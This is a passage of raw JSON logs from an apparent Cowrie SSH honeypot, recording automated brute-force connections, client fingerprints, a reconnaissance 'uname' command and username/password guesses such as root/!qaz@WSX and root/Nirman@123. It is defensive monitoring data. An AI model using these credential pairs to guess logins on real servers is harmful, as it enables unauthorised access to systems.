ert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.725207Z","src_ip":"217.154.1.158","session":"ca017bf7700c"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.769647Z","src_ip":"217.154.1.158","session":"ca017bf7700c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:23:13.816917Z","src_ip":"217.154.1.158","session":"ca017bf7700c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.817675Z","src_ip":"217.154.1.158","session":"ca017bf7700c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.833169Z","src_ip":"217.154.1.158","session":"ca017bf7700c"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.834247Z","src_ip":"217.154.1.158","session":"ca017bf7700c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:23:13.844041Z","src_ip":"212.227.235.229","session":"db2be7576dcc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:23:14.908326Z","src_ip":"212.227.235.229","session":"db2be7576dcc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:15.174590Z","src_ip":"212.227.235.229","session":"db2be7576dcc"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:15.182863Z","src_ip":"212.227.235.229","session":"f33d6e610e75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35976,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4cb7829944b","protocol":"ssh","message":"New connection: 212.227.125.160:35976 (1.2.3.4:22) [session: c4cb7829944b]","sensor":"my-vps","timestamp":"2025-08-26T19:23:21.228667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:23:21.229694Z","src_ip":"212.227.125.160","session":"c4cb7829944b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T19:23:21.502057Z","src_ip":"212.227.125.160","session":"c4cb7829944b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:29.229620Z","src_ip":"212.227.125.160","session":"c4cb7829944b"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59028,"dst_ip":"1.2.3.4","dst_port":22,"session":"de97aa178005","protocol":"ssh","message":"New connection: 217.154.1.158:59028 (1.2.3.4:22) [session: de97aa178005]","sensor":"my-vps","timestamp":"2025-08-26T19:23:31.219627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:23:31.220435Z","src_ip":"217.154.1.158","session":"de97aa178005"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:23:31.235000Z","src_ip":"217.154.1.158","session":"de97aa178005"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T19:23:31.280909Z","src_ip":"217.154.1.158","session":"de97aa178005"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:32.297379Z","src_ip":"217.154.1.158","session":"de97aa178005"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37517,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa0f3a49740c","protocol":"ssh","message":"New connection: 212.227.235.229:37517 (1.2.3.4:22) [session: aa0f3a49740c]","sensor":"my-vps","timestamp":"2025-08-26T19:23:35.167392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:23:35.168367Z","src_ip":"212.227.235.229","session":"aa0f3a49740c"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:38.796453Z","src_ip":"212.227.235.229","session":"aa0f3a49740c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49386,"dst_ip":"1.2.3.4","dst_port":22,"session":"29d106511d7a","protocol":"ssh","message":"New connection: 212.227.235.229:49386 (1.2.3.4:22) [session: 29d106511d7a]","sensor":"my-vps","timestamp":"2025-08-26T19:23:41.199178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:23:41.200187Z","src_ip":"212.227.235.229","session":"29d106511d7a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:41.201115Z","src_ip":"212.227.235.229","session":"29d106511d7a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33146,"dst_ip":"1.2.3.4","dst_port":22,"session":"e459a8157fee","protocol":"ssh","message":"New connection: 217.154.1.158:33146 (1.2.3.4:22) [session: e459a8157fee]","sensor":"my-vps","timestamp":"2025-08-26T19:23:48.662117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:23:48.663222Z","src_ip":"217.154.1.158","session":"e459a8157fee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:23:48.677764Z","src_ip":"217.154.1.158","session":"e459a8157fee"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:23:48.722493Z","src_ip":"217.154.1.158","session":"e459a8157fee"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:49.739326Z","src_ip":"217.154.1.158","session":"e459a8157fee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35212,"dst_ip":"1.2.3.4","dst_port":22,"session":"400f7bfcf037","protocol":"ssh","message":"New connection: 212.227.235.229:35212 (1.2.3.4:22) [session: 400f7bfcf037]","sensor":"my-vps","timestamp":"2025-08-26T19:23:52.685431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:23:53.349130Z","src_ip":"212.227.235.229","session":"400f7bfcf037"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:23:53.349975Z","src_ip":"212.227.235.229","session":"400f7bfcf037"}
{"eventid":"cowrie.login.success","username":"root","password":"Nirman@123","message":"login attempt [root/Nirman@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:23:57.119226Z","src_ip":"212.227.235.229","session":"400f7bfcf037"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:23:57.905022Z","src_ip":"212.227.235.229","session":"400f7bfcf037"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60610,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd6b30d0ca43","protocol":"ssh","message":"New connection: 217.154.1.158:60610 (1.2.3.4:22) [session: cd6b30d0ca43]","sensor":"my-vps","timestamp":"2025-08-26T19:24:06.199040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:24:06.200445Z","src_ip":"217.154.1.158","session":"cd6b30d0ca43"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:24:06.215286Z","src_ip":"217.154.1.158","session":"cd6b30d0ca43"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T19:24:06.260621Z","src_ip":"217.154.1.158","session":"cd6b30d0ca43"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:24:07.277319Z","src_ip":"217.154.1.158","session":"cd6b30d0ca43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38102,"dst_ip":"1.2.3.4","dst_port":22,"session":"58336209de7b","protocol":"ssh","message":"New connection: 212.227.235.229:38102 (1.2.3.4:22) [session: 58336209de7b]","sensor":"my-vps","timestamp":"2025-08-26T19:24:19.585299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:24:19.586227Z","src_ip":"212.227.235.229","session":"58336209de7b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:24:19.835867Z","src_ip":"212.227.235.229","session":"58336209de7b"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123","message":"login attempt [dspace/123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:24:20.871209Z","src_ip":"212.227.235.229","session":"58336209de7b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:24:22.118863Z","src_ip":"212.227.235.229","session":"58336209de7b"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52808,"dst_ip":"1.2.3.4","dst_port":22,"session":"f66c279c5c4b","protocol":"ssh","message":"New connection: 217.154.1.158:52808 (1.2.3.4:22) [session: f66c279c5c4b]","sensor":"my-vps","timestamp":"2025-08-26T19:24:23.753309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:24:23.753974Z","src_ip":"217.154.1.158","session":"f66c279c5c4b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:24:23.768429Z","src_ip":"217.154.1.158","session":"f66c279c5c4b"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-26T19:24:23.811507Z","src_ip":"217.154.1.158","session":"f66c279c5c4b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:24:24.827025Z","src_ip":"217.154.1.158","session":"f66c279c5c4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55484,"dst_ip":"1.2.3.4","dst_port":22,"session":"b853c706b32d","protocol":"ssh","message":"New connection: 212.227.235.229:55484 (1.2.3.4:22) [session: b853c706b32d]","sensor":"my-vps","timestamp":"2025-08-26T19:24:26.434820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:24:26.437256Z","src_ip":"212.227.235.229","session":"b853c706b32d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":49804,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6ce17816269","protocol":"ssh","message":"New connection: 217.154.1.158:49804 (1.2.3.4:22) [session: e6ce17816269]","sensor":"my-vps","timestamp":"2025-08-26T19:24:41.289706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:24:41.290643Z","src_ip":"217.154.1.158","session":"e6ce17816269"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"